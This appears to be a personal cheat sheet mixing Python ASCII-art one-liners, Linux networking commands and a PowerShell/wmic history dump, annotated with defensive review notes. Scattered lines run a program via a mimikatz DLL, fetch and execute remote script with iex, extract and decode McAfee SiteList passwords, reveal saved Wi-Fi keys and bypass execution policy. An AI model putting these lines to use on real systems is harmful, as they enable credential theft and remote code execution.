# Personal cheat sheet: ASCII-art one-liners, UNIX networking snippets, PowerShell/wmic
# commands and a sorted interactive-history dump. This is NOT a runnable script: the
# sections mix Python 3, bash/awk, PowerShell and cmd, and each line is meant to be pasted
# into the matching interpreter. Hosts, paths and credentials ("user:pass", C:\path,
# 10.0.0.1, xn--mric-bpa.fr, ...) are the author's own examples.
#
# ASCII Art
# Unicode heartception
# chr(9825) is U+2661 WHITE HEART SUIT, chr(9829) is U+2665 BLACK HEART SUIT; the boolean
# expression (two discs | (lower-half triangle)) selects the filled glyph per cell.
print("\n".join(["".join([chr(9825+4*((min([(i-6)**2+(j-u)**2 for u in[25,35]])<30)|(i>7)&(abs(j-30)<19-i)))for j in range(60)])for i in range(20)]))
# Sierpinski « emoji sierpinski python3 twitter-sized one-liner »
# (x|y==x+y) parses as (x|y)==(x+y), i.e. true iff x and y share no set bits — the
# Sierpinski gasket rule. "\x1b[3<d>m" is an ANSI colour escape, chosen by (x^y)%10.
z=range(32);print("\n".join([" ".join(["\x1b[3"+str((x^y)%10)+"m"+chr(0x1f300+(x**y%1140))if(x|y==x+y)else" "for x in z])for y in z]))
# 4chan stuff
# Same bit rule, rows printed bottom-up in steps of two and centred on c columns.
c=64;print("\n".join([("{:^"+str(c)+"s}").format("".join([chr(0x0fd5)if(x|y==x+y)else" "for x in range(c)]).strip())for y in range(c-1,-1,-2)]))
# Gradients
# 2+sin+sin ranges over [0,4], times 2.5 gives an index 0..10 into the 11-char ramp.
import math;print("\n".join(["".join([" -·~c»¤¢XM¶"[int(2.5*(2+math.sin(j/4)+math.sin(i/2)))] for j in range(99)])for i in range(30)]))
# UNIX stuff
get eth0 address
# NOTE(review): fragile text scraping (depends on "eth0" and "inet" co-occurring on the
# line); `ip -4 -o addr show dev eth0` emits one machine-parseable line per address.
ip addr show|grep eth0|grep inet|sed -e 's/ *inet *//g' -e 's/\/.*//g'
# Bridge two interfaces under X.
ip link add name X type bridge
ip link set X up
# NOTE(review): "set" is not an ip(8) object; presumably `ip link set eth0 master X`
# (and the same for eth1) was meant.
ip set eth0 master X
ip set eth1 master X
THE TCP SOCKETS ARE IN /proc/net/tcp !
# Captive-portal style rule: every inbound TCP connection on eth0 whose destination port is
# NOT 22/53/80/443 is redirected to local port 80. Whatever listens on :80 then receives
# traffic aimed at arbitrary ports, so keep the rule scoped to the intended interface and
# log matches.
iptables -t nat -A PREROUTING -i eth0 -p tcp -m tcp -m multiport ! --dports 22,53,80,443 -j REDIRECT --to-port 80
# Using high codepoints to compress data :
# Packs each byte pair into one code point in U+10000..U+1FFFF (Plane 1), so the output is
# valid UTF-8 text (no surrogates). An odd trailing byte would be dropped by the range
# step, but an .xz stream is always a multiple of 4 bytes long. sys.stdout.write needs a
# UTF-8 capable locale (e.g. PYTHONIOENCODING=utf-8).
cat file.dat | xz | python3 -c 'import sys;a=sys.stdin.buffer.read();sys.stdout.write("".join([chr(0x10000+256*a[i]+a[i+1]) for i in range(0,len(a) - (len(a)%2),2)]))' > file.xz.utf8.txt
# Inverse: each code point back to its high and low byte.
cat file.xz.utf8.txt | python3 -c 'import sys;a=sys.stdin.read();sys.stdout.buffer.write(bytes([i for c in a for i in [(ord(c)>>8)&0xff,ord(c)&0xff]]))' | xz -d > file.dat
# Generate a usable oui.txt
# Merges the IEEE OUI / MA-M / OUI-36 / IAB registries (Debian ieee-data package paths)
# into "<prefix> <vendor>" lines. `printf $1` uses the field as the format string — safe
# only because the field is hex digits; `printf "%s", $1` is the robust form.
#!/bin/bash
{
awk '/(base 16)/ {print $1,substr($0,25)}' /var/lib/ieee-data/oui.txt
awk '/hex/ {gsub("-","",$1);printf $1;getline;print substr($1,1,1),substr($0,30)}' /var/lib/ieee-data/mam.txt
awk '/hex/ {gsub("-","",$1);printf $1;getline;print substr($1,1,3),substr($0,30)}' /var/lib/ieee-data/oui36.txt
awk '/hex/ {gsub("-","",$1);printf $1;getline;print substr($1,1,3),substr($0,27)}' /var/lib/ieee-data/iab.txt
} | sort
# Powershell stuff
# Add DejaVu to cmd.exe fonts
(New-Object System.Drawing.Text.InstalledFontCollection).Families
Get-ItemProperty "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont"
# Writes under HKLM — needs an elevated shell.
Set-ItemProperty "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont" -name 000 -value "DejaVu Sans Mono"
# List proxy info
# Proxy / AutoConfigURL / WPAD values are a classic traffic-interception persistence spot;
# worth checking during incident response.
Get-ItemProperty "HKCU:\software\Microsoft\Windows\CurrentVersion\Internet Settings\"
Get-ItemProperty "HKCU:\software\Microsoft\Windows\CurrentVersion\Internet Settings\" "AutoConfigURL"
Get-ItemProperty "HKCU:\software\Microsoft\Windows\CurrentVersion\Internet Settings\" "ProxyServer"
Get-ChildItem -recurse 'HKCU:\software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\' | % { $_.GetValue("WpadDetectedURL") } | sort -Unique
# List LAN info, renew DHCP
wmic nicconfig where ipenabled=true call /?
wmic nicconfig where ipenabled=true call RenewDHCPLease
wmic nicconfig where ipenabled=true call ReleaseDHCPLease
wmic nicconfig where ipenabled=true list brief
wmic nicconfig where ipenabled=true get ipaddress,macaddress,dnsserversearchorder,dnshostname,defaultipgateway,dhcpserver,description /format:list
wmic nicconfig where ipenabled=true list full
# Enumerate the "properties" of files, as shown by the Microsoft Windows "Shell" explorer.exe
# getDetailsOf(item, column) for column ids 0..260; empty columns are filtered out.
$shell=New-Object -ComObject Shell.Application
$shell.namespace("$(pwd)").items() | % { $z=$_; 0..260 | %{ New-Object psobject -Property @{id=$_;value=$shell.namespace("$(pwd)").getDetailsOf($z,$_) } | Where-Object { $_.value -ne "" } } }
# This key is used on Windows 10 to mark some network types (eth/wlan/wwan) as metered.
# Modifying it can prevent automatic Windows updates (= no updates on 4G by default), which
# is useful on a small bandwidth. The key is not writable as it is owned by an NT AUTHORITY
# account; ownership has to be taken first. Needs fixing.
get-item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\DefaultMediaCost\"
# Ping the subnet
$ping = New-Object System.Net.Networkinformation.Ping
1..254 | % { $ping.send("192.168.100.$_") | select address, status }
# NOTE(review): -le 256 runs one iteration past the last valid octet (255); .0 and .255
# are the network and broadcast addresses on a /24, as the 1..254 loop above assumes.
for ( $i = 0; $i -le 256 ; $i++ ) { ping 192.168.0.$i }
# Get help on a python module
py -3 -m pydoc struct
# Show powershell version
$psversiontable
# Play with the audio api of windows :D
# (the dash before ComObject is an en dash; PowerShell tolerates it as a parameter prefix)
(New-Object –ComObject SAPI.SPVoice).Speak("Hello wurld")
# Run an arbitrary program with mimikatz dll
# NOTE(review): rundll32 loading a DLL from outside System32 with a custom export is a
# high-signal detection; Sysmon image-load events (ID 7) and EDR should alert on it.
rundll32 c:\path\mimilib.dll,start d:\otherpath\a.exe
# Show saved credentials via the Windows Credential Manager
# Opens the "Stored User Names and Passwords" dialog: lists entries, does not reveal secrets.
rundll32 keymgr.dll,KRShowKeyMgr
# Take a screenshot after 5s (see "TakeScreenshot.ps1" on the heyscriptguy tech blog)
cmd /c "timeout /T 5 & %windir%\system32\SnippingTool.exe"
# Golden github https://github.com/cure53/HTTPLeaks
# Extract an archive without "Expand-Archive"
Add-Type -A System.IO.Compression.FileSystem;[IO.Compression.ZipFile]::ExtractToDirectory(src,dst)
# Download a file to stdout (iwr does not work everywhere)
# -useb is the prefix form of -UseBasicParsing (no Internet Explorer engine dependency).
# NOTE(review): plain HTTP, so the content can be altered in transit; anything piped into
# iex afterwards runs as the current user — Script Block Logging (Event 4104) records it.
iwr -useb http://xn--mric-bpa.fr/x.php
# NOTE(review): credentials embedded in the URL end up in console history, transcripts and
# process listings; set $wc.Credentials = New-Object Net.NetworkCredential(...) instead.
(New-Object System.Net.WebClient).DownloadData("ftp://user:pass@localhost/a")
# From here down to the end of the wmic block the lines are a SORTED shell-history dump:
# duplicates, typos ([Syste.Byte], et-ChildItem, decription, btier, dhcpeneblaed, -usb,
# System.Net.Client) and calls that only make sense with earlier session state ($data,
# $bytes, $key, $a being a WebClient rather than the array assigned below) are kept verbatim.
$a = @(for ($i=1;$i -le 5; $i++) { [System.Net.DNS]::GetHostAddresses("ns${i}.domain.net") | % { $_.ipaddresstostring } })
$a.DownloadString("http://xn--mric-bpa.fr/")
$a=$( Get-ChildItem -recurse )
$a=(New-Object System.Net.Client)
$a=(New-Object System.Net.WebClient)
$env:OS
$env:PUBLIC
$env:windir
$psversiontable
# Hex string -> one byte per pipeline element.
$s="12150F10111C1A060A1F1B1817160519"; 0..(($s.Length/2)-1) | % { [byte]::parse($s.Substring(2*($_),2),[System.Globalization.NumberStyles]::HexNumber) }
& 'C:\Program Files (x86)\PDFtk\bin\pdftk.exe' .\a.pdf cat output b.pdf compress
& 'C:\Program Files (x86)\PDFtk\bin\pdftk.exe' .\c.pdf cat output d.pdf compress
& 'C:\Program Files (x86)\PDFtk\bin\pdftk.exe' .\c.pdf cat output d.pdf uncompress
& 'C:\Program Files (x86)\PDFtk\bin\pdftk.exe' .\d.pdf cat output e.pdf compress
& 'C:\opt\bin\exiftool(-k).exe' *
(New-Object -ComObject SAPI.SPVoice).Speak("Hello wurld")
(New-Object System.Net.WebClient).DownloadString("http://xn--mric-bpa.fr/oneliners.txt")
([System.Security.Cryptography.SHA1]::Create()).ComputeHash([System.Text.Encoding]::UTF8.GetBytes(""))
# McAfee ePO agent SiteList.xml holds repository passwords as base64 of an obfuscated blob.
# Defensively: the file has historically been readable by standard users — audit its ACL.
([xml]$(Get-Content 'C:\ProgramData\McAfee\Common Framework\SiteList.xml')).SelectNodes("//Password").innertext | Get-Unique
([xml]$(Get-Content 'C:\ProgramData\McAfee\Common Framework\SiteList.xml')).SelectNodes("//Password").innertext | Get-Unique | % { [System.Convert]::FromBase64String($_) }
Compress-Archive --help
Expand-Archive .\lsass.zip
# Get-AD* cmdlets need the ActiveDirectory (RSAT) module.
Get-ADComputer -filter { ipv4address -eq "10.0.0.1" }
Get-ADComputer -filter { name -like "somehostname" }
Get-ADComputer hostname
Get-ADComputer hostname -properties *
Get-ADComputer hostname -properties * | Export-Csv hostname.csv
Get-ADComputer mqlkjfmozeifskjfnmlzkf
Get-ADUser -filter { objectsid -equals "S-1-5-21-somesid" }
Get-ADUser login -properties * | select *
Get-ADUser login -properties * | select objectsid
Get-Acl
Get-ChildItem
Get-ChildItem
# Cert: drive — useful to audit unexpected trusted publishers / peers in the user store.
Get-ChildItem 'Cert:\CurrentUser\McAfee Trust\'
Get-ChildItem 'Cert:\CurrentUser\Trust'
Get-ChildItem 'Cert:\CurrentUser\TrustedPeople\'
Get-ChildItem 'Cert:\CurrentUser\TrustedPeople\' | select *
Get-ChildItem 'Cert:\CurrentUser\TrustedPublisher\'
Get-ChildItem -Recurse
Get-ChildItem -Recurse -Filter "*py"
Get-ChildItem -Recurse -Filter "*py" | % { Select-String "a server" $_.FullName }
Get-ChildItem -Recurse -Filter "*py" | % { Select-String "server" $_.FullName }
Get-ChildItem -Recurse -Filter "*py" | select *
Get-ChildItem -Recurse -Filter "*py" | select * | head
Get-ChildItem -Recurse -Filter "*py" | select * | vim -
Get-ChildItem -Recurse -Filter "*py" | select fullname
Get-ChildItem -Recurse -Filter "*py" | select fullname | % { Select-String "server" $_ }
Get-ChildItem -Recurse -Filter "*py" | select fullname | % { Select-String "server" -path $_ }
Get-ChildItem -Recurse -Filter "*py" | select fullname | Select-String
Get-ChildItem -Recurse -Filter "*py" | select fullname | Select-String "server" $_
Get-ChildItem -Recurse -Filter "*py" | select fullpath
Get-ChildItem -Recurse -Filter "*py" | select name
Get-ChildItem -Recurse -Filter "*py" | select path
Get-ChildItem -Recurse -Filter { name -like "*py" }
Get-ChildItem -Recurse -filter { name -like "*.py" }
Get-ChildItem -recurse
Get-ChildItem -recurse
Get-ChildItem -recurse -Filter { FullName -equals "*txt" }
Get-ChildItem -recurse -Filter { FullName -like "txt" }
Get-ChildItem -recurse -Filter { FullName -like * }
Get-ChildItem -recurse -Filter { name -like "*txt" }
Get-ChildItem -recurse -Filter { name -like * }
Get-ChildItem -recurse -Filter { name -like *.txt }
Get-ChildItem -recurse -Filter { name -like *txt }
Get-ChildItem -recurse -depth 2
Get-ChildItem -recurse -depth 2 -properties * | % { New-Object psobject -property @(path=$_.fullname;time_c=$_.CreationTime) }
Get-ChildItem -recurse -depth 2 | % { $_.fullname; $_.CreationTime ; $_.lastwritetime; $_.lastaccesstime }
Get-ChildItem -recurse -depth 2 | % { $_.fullname; $_.CreationTime ; $_.lastwritetime; $_.lastaccesstime } | Export-Csv 'C:\test\a.csv'
Get-ChildItem -recurse -include *txt,*bat | select fullname
Get-ChildItem -recurse ps* -include *.msu,*exe | select fullname
Get-ChildItem cert:\CurrentUser\
# Rolling-XOR decode of a byte file; presumably ReadCount is the 1-based byte position
# attached by Get-Content — verify, it is not visible here.
Get-Content .\data.bin -encoding Byte | foreach { [convert]::ToChar($( $_ -bxor ( 0x42 - $_.readcount ) )) }
Get-NetworkSwitchEthernetPort
Get-PSReadlineKeyHandler
Import-Csv .\somefile.csv | select sourceaddress,sourcezonename,sourceprocessname | Group-Object -AsHashTable -AsString
Import-Csv .\somefile.csv | select sourceaddress,sourcezonename,sourceprocessname | Sort-Object
Import-Csv .\somefile.csv | select sourceaddress,sourcezonename,sourceprocessname | Sort-Object -Property sourceaddress
Import-Csv .\somefile.csv | select sourceaddress,sourcezonename,sourceprocessname | Sort-Object -Property sourceaddress
Import-Csv .\somefile.csv | select sourceaddress,sourcezonename,sourceprocessname | Sort-Object -Property sourceaddress |Get-Unique -OnType
# Pulls the 2nd and 4th double-quoted tokens (payload, key) out of each matching line.
Select-String function_decode .\evil.txt | % { $data=$_.line.split('"')[1];$key=$_.line.split('"')[3]; echo [$data,$key]}
[Convert]::FromBase64String($data)
# FromBase64String takes a string, not a byte[]; the three GetBytes variants below are
# failed attempts kept from the history.
[Convert]::FromBase64String([System.Text.Encoding]::ASCII.GetBytes($data))
[Convert]::FromBase64String([System.Text.Encoding]::ASCII.GetBytes($data+"="))
[Convert]::FromBase64String([System.Text.Encoding]::ASCII.GetBytes($data+"=="))
[Convert]::ToBase64String($bytes)
[Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes($data))
[Syste.Byte]::Parse("aa",[System.Globalization.NumberStyles]::HexNumber)
[System.BitConverter]::ToString($(Get-Content .\data.bin -encoding Byte))
# MD5 / SHA-1 of the empty string, rendered as "XX-XX-..." hex.
[System.BitConverter]::ToString(([System.Security.Cryptography.MD5]::Create()).ComputeHash([System.Text.Encoding]::UTF8.GetBytes("")))
[System.BitConverter]::ToString(([System.Security.Cryptography.SHA1]::Create()).ComputeHash([System.Text.Encoding]::UTF8.GetBytes("")))
[System.BitConverter]::ToString(Get-Content .\data.bin -encoding Byte)
[System.BitConverter]::ToString([System.Security.Cryptography.MD5CryptoServiceProvider]::new().ComputeHash([System.Text.UTF8Encoding]::new().GetBytes("")))
[System.Bitconverter]::ToString(([System.Security.Cryptography.SHA1]::Create()).ComputeHash([System.Text.Encoding]::UTF8.GetBytes("")))
[System.Byte]::Parse("3")
[System.Byte]::Parse("aa")
[System.Byte]::Parse(33)
[System.Convert]::ToByte("0xaa")
[System.Convert]::ToByte("a")
[System.Convert]::ToByte("aa")
[System.Convert]::ToByte(23)
[System.Net.DNS]::GetHostAddresses("x.fr") | select ipaddresstostring
[System.Net.DNS]::GetHostName("8.8.8.8")
[System.Net.Dns]::GetHostAddresses("google.com")
[System.Net.Dns]::GetHostAddresses("thepiratebay.se")
[System.Net.Dns]::GetHostByAddress("10.0.0.1")
[System.Net.Dns]::Resolve("google.com")
[System.Net.Dns]::Resolve("google.com",true)
[System.Net.NetworkInformation.NetworkInterface]::GetAllNetworkInterfaces()
[System.Net.NetworkInformation.NetworkInterface]::GetIsNetworkAvailable()
[System.Security.Cryptography.MD5CryptoServiceProvider]::new().ComputeHash([System.Text.UTF8Encoding]::new().GetBytes(""))
[System.Text.Encoding]::ASCII.GetBytes($data)
[System.Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($data))
[System.Text.Encoding]::GetEncoding("cp437")
[System.Text.Encoding]::GetEncoding("cp437").GetString(140)
[System.Text.Encoding]::GetEncoding("cp437").GetString(42)
[System.Text.Encoding]::GetEncoding("cp437").GetString(44)
[System.Text.Encoding]::GetEncoding("hex")
[System.Text.Encoding]::GetEncoding("windows-cp437")
[System.Text.Encoding]::GetEncodings()
[System.Text.Encoding]::Unicode.GetBytes($data)
[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($data))
[xml]$(Get-Content 'C:\ProgramData\McAfee\Common Framework\SiteList.xml').SelectNodes("//*Password")
et-ChildItem cert:\CurrentUser
get-aduser -filter { mail -like "user@host.tld" }
get-aduser -filter { mail -like "user@host.tld" } -properties *
hdwwiz.cpl
# NOTE(review): `iex <url>` / `type file | iex` evaluate whatever text they are given as
# code in the current session; the remote variants fetch it over plain HTTP. Script Block
# Logging captures the evaluated content for detection.
iex -useb http://xn--mric-bpa.fr/x.php
iex http://xn--mric-bpa.fr/x.php
ipconfig /release
ipconfig /renew
iwr -usb http://xn--mric-bpa.fr/x.php
iwr -useb http://xn--mric-bpa.fr/x.php
# Stored Wi-Fi profiles: `key=clear` prints the saved PSK and needs an elevated prompt;
# remove stale profiles (delete profile) when decommissioning a machine.
netsh wlan delete profile name="BotConf2016"
netsh wlan dump
netsh wlan show profiles key=clear name="BotConf2016"
netsh wlan show profiles name="BotConf2016" key=clear
netsh wlan show settings
py -3 -c "import time;print(time.strftime('%Y-%m-%d %H:%M:%S %z'))"
py -3 -m ftplib -d localhost -l -p -l
# NOTE(review): --cgi executes scripts under cgi-bin/ and the server binds all interfaces
# by default; add --bind 127.0.0.1 unless it is meant to be reachable from the network.
py -3 -m http.server 80 --cgi
rundll32 keymgr.dll,KRShowKeyMgr
type .\evil.txt | iex
type C:\test\b.txt | Measure-Object | select lines
wmic nicconfig list brief
wmic /?
wmic baseboard list
wmic bios get serialnumber
wmic bios list full
wmic computersystem get Manufacturer
wmic computersystem list brief
wmic cpu get decription
wmic cpu get decription,name
wmic cpu list brief
wmic cpu list decription,name
wmic cpu list full
wmic desktop list brief
wmic desktopmonitor list
wmic desktopmonitor list brief
wmic display
wmic nic list
wmic nic list brief
wmic nic where deviceid=27 list full
wmic nicconfig
wmic nicconfig list
wmic nicconfig list brief
wmic nicconfig list brief where dhcpenabled=true
wmic nicconfig list btier
wmic nicconfig list full
wmic nicconfig list full | vim -
wmic nicconfig where "dhcpenabled=true and ipenabled=true" list /format:list
wmic nicconfig where "dhcpenabled=true and ipenabled=true" list brief
wmic nicconfig where "dhcpenabled=true and ipenabled=true" list brief
wmic nicconfig where "dhcpenabled=true and ipenabled=true" list brief /format:list
wmic nicconfig where "dhcpenabled=true and ipenabled=true" list full /format:list
wmic nicconfig where "ipenabled=true and dhcpenabled=true" call ReleaseDHCPLease
wmic nicconfig where "ipenabled=true and dhcpenabled=true" call RenewDHCPLease
wmic nicconfig where "ipenabled=true and dhcpenabled=true" get ipaddress,defaultipgateway,description,dhcpserver
wmic nicconfig where "ipenabled=true and dhcpenabled=true" get ipaddress,defaultipgateway,description,dhcpserver,macaddress,dnsserversearchorder
wmic nicconfig where "ipenabled=true and dhcpenabled=true" get ipaddress,defaultipgateway,description,dhcpserver,macaddress,dnsserversearchorder /format:list
wmic nicconfig where "ipenabled=true and dhcpenabled=true" list brief
wmic nicconfig where "ipenabled=true and dhcpenabled=true" list full
wmic nicconfig where "ipenabled=true and dhcpeneblaed=true" /?
wmic nicconfig where "ipenabled=true" list brief
wmic nicconfig where "ipenabled=true" list full
wmic nicconfig where dhcpenabled=true
wmic nicconfig where dhcpenabled=true list brief
wmic nicconfig where dhcpenabled=true list full
wmic nicconfig where index=11 list full
wmic nicconfig where ipenabled=true list brief
wmic nicconfig where ipenabled=true list brief /format:list
wmic os list brief
wmic product list brief
wmic sysdriver list
wmic sysdriver list brief
# 32-bit PowerShell host (syswow64) with no profile (-NoP), non-interactive (-NonI) and
# the execution policy ignored (-Exec Bypass). NOTE(review): execution policy is a safety
# latch, not a security boundary — enforce with AppLocker/WDAC and rely on Script Block
# Logging and module logging for visibility.
%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -Exec Bypass -Command "whoami"
# CSV of 5-tuple + protocol/info per packet (cygwin path). ssl.* field names are the
# pre-3.0 ones; Wireshark 3.0 renamed them to tls.*.
/cygdrive/c/Program\ Files/Wireshark/tshark.exe -r ${i} -Eseparator=, -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport -e _ws.col.Protocol -e _ws.col.info
# SCAN IMAGES ON WINDOWS WITHOUT SHITTY BINARIES AND ONLY THE DEFAULT APIS DAMN MICROSOFT
(New-Object -ComObject WIA.DeviceManager).DeviceInfos.Item(1).Connect().Items(1).Transfer().SaveFile("$(pwd)\scan.bmp")
# Same stuff with a popup menu offering some options and parameters
(New-Object -ComObject WIA.CommonDialog).ShowAcquireImage().SaveFile("$(pwd)\testx.bmp")
mmc devmgmt.msc
# Windows native popup :D https://twitter.com/TekDefense/status/823204388982362118
wlrmdr.exe -s 60000 -f 1 -t "text" -m "more text" -a o
# print a list of "${ip} ${port1},${port2},${port3}" from a list of "${ip} ${port}"
# awk accumulates ports per IP; `for (k in t)` iterates in unspecified order, hence the
# second sort -V.
sort -V ip.port.open.txt | awk '{t[$1]=t[$1]","$2} END {for (k in t) {gsub(/^,/,"",t[k]);print k,t[k]}}' |sort -V | column -t
# Dumps the TLS server certificates found in every .pcap of the directory as DER files
# (CERT_0.der, CERT_1.der, ...). `-encoding byte` is Windows PowerShell 5 syntax (PS 7
# uses -AsByteStream). NOTE(review): with -T fields, multiple occurrences of a field
# (a certificate chain) are joined with ',' by default, so split(":") can yield a token
# like "xx,yy" that [Byte]::Parse rejects — confirm and pass -E occurrence=f or a
# different aggregator if needed.
$cn=0; Get-ChildItem -filter *.pcap | % { & 'C:\Program Files\Wireshark\tshark.exe' -r $_.fullname -Y 'ssl.handshake.certificate' -T fields -e ssl.handshake.certificate } | % { $x=$_;Set-Content -value ($x.split(":") | % { [Byte]::Parse($_,[System.Globalization.NumberStyles]::HexNumber) }) -encoding byte -path "CERT_${cn}.der" ; $cn += 1;}
calendar
# ncal: Monday-first weeks (-M), old-style layout (-b), 2 months back and 6 ahead.
alias cal='ncal -M -b -A6 -B2'